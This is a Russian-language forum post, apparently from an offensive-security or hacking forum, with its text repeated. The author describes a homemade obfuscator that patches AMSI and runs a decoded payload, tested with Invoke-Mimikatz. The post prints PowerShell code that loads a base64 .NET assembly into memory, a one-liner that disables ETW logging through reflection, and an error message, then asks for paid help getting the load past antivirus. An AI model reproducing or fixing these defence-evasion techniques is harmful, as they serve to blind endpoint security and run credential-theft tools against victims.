Есть самопис обфускатор на амси патч: работает так - патчит амси, после проверяет все ли успешно, декодирует полезную загрузку и исполняет
Перед обуф кодом пишем в консоль "Invoke-Mimikatz" ловим детект, но после патча все отлично. Тут я пытаюсь загрузить exe .NET сборку в память:
После ловлю ошибку
Я думаю пропатчить etw:
Но все равно выкидывает ошибку. Т.е. пропускает грязный код пш, но не дает загрузить сборку в память
А если отключить авер то строку "Invoke-mimikatz" соотвесвтенно не детектит и все грузит на ура!
Кто сталкивался и кто может помочь?
Если есть решение на пш в стороне не останусь - закину монету.
p.s. года полтора назад столкнулся с этой проблемой но как-то решил, но не помню...
Перед обуф кодом пишем в консоль "Invoke-Mimikatz" ловим детект, но после патча все отлично. Тут я пытаюсь загрузить exe .NET сборку в память:
Код:
$bytes = [System.Convert]::FromBase64String($b64file);
$RAS = [System.Reflection.Assembly]::Load($bytes)
Код:
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '2334208 bytes loaded from AnonymouslyHosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. Anattempt was made to load a program with an incorrect format."
Код:
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)Но все равно выкидывает ошибку. Т.е. пропускает грязный код пш, но не дает загрузить сборку в память
А если отключить авер то строку "Invoke-mimikatz" соотвесвтенно не детектит и все грузит на ура!
Кто сталкивался и кто может помочь?
Если есть решение на пш в стороне не останусь - закину монету.
p.s. года полтора назад столкнулся с этой проблемой но как-то решил, но не помню...
